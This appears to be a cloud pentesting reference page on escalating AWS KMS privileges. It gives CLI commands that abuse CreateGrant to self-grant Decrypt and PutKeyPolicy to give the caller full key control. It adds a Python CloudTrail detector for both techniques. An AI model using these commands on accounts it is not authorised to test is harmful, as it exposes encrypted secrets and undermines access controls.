# Key Management Service (KMS)

## kms:CreateGrant

* With this action available, you can create a grant on a KMS key for your own principal and thereby give yourself the cryptographic operations the grant names (for example `Decrypt`).
* Grants are evaluated alongside key policies and IAM policies. They are often used for temporary permissions because you can create one, use its permissions, and then retire it, all without changing your key policies or IAM policies.

{% code overflow="wrap" %}

```bash
# create a grant for yourself
aws kms create-grant --key-id <keyId> --grantee-principal <userARN> --operations Decrypt
```

{% endcode %}

{% code overflow="wrap" %}

```bash
# decrypt data with the grant
aws kms decrypt --grant-tokens <grantToken> --ciphertext-blob <cipherText> --key-id <keyId> --output text --query Plaintext | base64 --decode
```

{% endcode %}

***

## kms:PutKeyPolicy

* With this action available, you can update or replace the key policy of a KMS key so that it permits your own principal. The only valid value for `--policy-name` is `default`.

{% code overflow="wrap" %}

```bash
# update key policy
aws kms put-key-policy --policy file://key-policy.json --policy-name default --key-id <keyId>
```

{% endcode %}

{% code title="key-policy.json" overflow="wrap" %}

```json
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::123456789012:root"
            },
            "Action": "kms:*",
            "Resource": "*"
        },
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::123456789012:user/<userName>"
            },
            "Action": [
                "kms:*"
            ],
            "Resource": "*"
        }
    ]
}
```

{% endcode %}
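The detection side of both abuses above, as an added example that is not part of this page: a small Python script that triages CloudTrail records for a `CreateGrant` whose grantee is the calling principal and a `PutKeyPolicy` that hands the caller (or everyone) `kms:*`. The record layout follows CloudTrail's `userIdentity` / `requestParameters` shape, the assumption that `requestParameters.policy` arrives as a JSON string is marked in the code, and every ARN, key ID and principal name is a constructed sample value.

```python
"""Triage CloudTrail records for self-serving KMS CreateGrant / PutKeyPolicy calls.

Added example, not code from the original page. Assumptions: records follow the
CloudTrail layout (userIdentity, requestParameters); PutKeyPolicy's
requestParameters.policy is carried as a JSON string; every ARN, key ID and
name below is a constructed sample value.
"""
import json

KEY = "arn:aws:kms:us-east-1:123456789012:key/11111111-2222-3333-4444-555555555555"
ALICE = "arn:aws:iam::123456789012:user/alice"
ROOT = "arn:aws:iam::123456789012:root"

# Constructed sample records: a self-grant, a grant for a different principal
# made from an assumed-role session, and a key policy rewrite that adds the caller.
SAMPLE_EVENTS = [
    {"eventName": "CreateGrant",
     "userIdentity": {"arn": ALICE},
     "requestParameters": {"keyId": KEY, "granteePrincipal": ALICE,
                           "operations": ["Decrypt"]}},
    {"eventName": "CreateGrant",
     "userIdentity": {"arn": "arn:aws:sts::123456789012:assumed-role/deployer/build-42",
                      "sessionContext": {"sessionIssuer": {
                          "arn": "arn:aws:iam::123456789012:role/deployer"}}},
     "requestParameters": {"keyId": KEY,
                           "granteePrincipal": "arn:aws:iam::123456789012:role/app",
                           "operations": ["Encrypt"]}},
    {"eventName": "PutKeyPolicy",
     "userIdentity": {"arn": ALICE},
     "requestParameters": {"keyId": KEY, "policyName": "default",
                           "policy": json.dumps({"Version": "2012-10-17", "Statement": [
                               {"Effect": "Allow", "Principal": {"AWS": ROOT},
                                "Action": "kms:*", "Resource": "*"},
                               {"Effect": "Allow", "Principal": {"AWS": ALICE},
                                "Action": ["kms:*"], "Resource": "*"}]})}},
]


def caller_arns(event):
    """ARNs identifying the caller: the session ARN plus, for an assumed role,
    the role ARN from sessionIssuer, so a role granting to itself is still caught."""
    ident = event.get("userIdentity", {})
    arns = {ident.get("arn", "")}
    issuer = ident.get("sessionContext", {}).get("sessionIssuer", {})
    arns.add(issuer.get("arn", ""))
    arns.discard("")
    return arns


def is_self_grant(event):
    """True for a CreateGrant whose grantee is the calling principal."""
    if event.get("eventName") != "CreateGrant":
        return False
    grantee = event.get("requestParameters", {}).get("granteePrincipal", "")
    return grantee in caller_arns(event)


def broad_allow_principals(policy):
    """Principals an Allow statement gives kms:* or * to, excluding the account
    root (the standard 'enable IAM policies' statement seen in every key policy)."""
    found = set()
    for stmt in policy.get("Statement", []):
        if stmt.get("Effect") != "Allow":
            continue
        actions = stmt.get("Action", [])
        actions = [actions] if isinstance(actions, str) else actions
        if not any(a in ("kms:*", "*") for a in actions):
            continue
        principal = stmt.get("Principal", {})
        if principal == "*":
            found.add("*")
            continue
        aws = principal.get("AWS", []) if isinstance(principal, dict) else []
        for p in ([aws] if isinstance(aws, str) else aws):
            if p == "*" or not p.endswith(":root"):
                found.add(p)
    return found


def self_serving_policy(event):
    """Principals a PutKeyPolicy hands kms:* to that are the caller itself or everyone."""
    if event.get("eventName") != "PutKeyPolicy":
        return set()
    raw = event.get("requestParameters", {}).get("policy", "{}")
    policy = json.loads(raw) if isinstance(raw, str) else raw  # assumption: JSON string
    return {p for p in broad_allow_principals(policy) if p == "*" or p in caller_arns(event)}


def triage(events):
    """Return (eventName, keyId, reason) for each record worth an analyst's attention."""
    findings = []
    for ev in events:
        params = ev.get("requestParameters", {})
        if is_self_grant(ev):
            findings.append((ev["eventName"], params.get("keyId"),
                             "caller granted itself " + ",".join(params.get("operations", []))))
        hits = self_serving_policy(ev)
        if hits:
            findings.append((ev["eventName"], params.get("keyId"),
                             "key policy now allows kms:* to " + ", ".join(sorted(hits))))
    return findings


if __name__ == "__main__":
    for name, key, reason in triage(SAMPLE_EVENTS):
        print(f"{name} on {key}: {reason}")
```

The grant made from the assumed-role session for a different principal is deliberately left unflagged, so the rule stays quiet on routine deployments; `broad_allow_principals` on its own is still useful as a periodic audit of every key policy in the account, since a policy that names a non-root principal with `kms:*` is worth a second look regardless of who wrote it.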

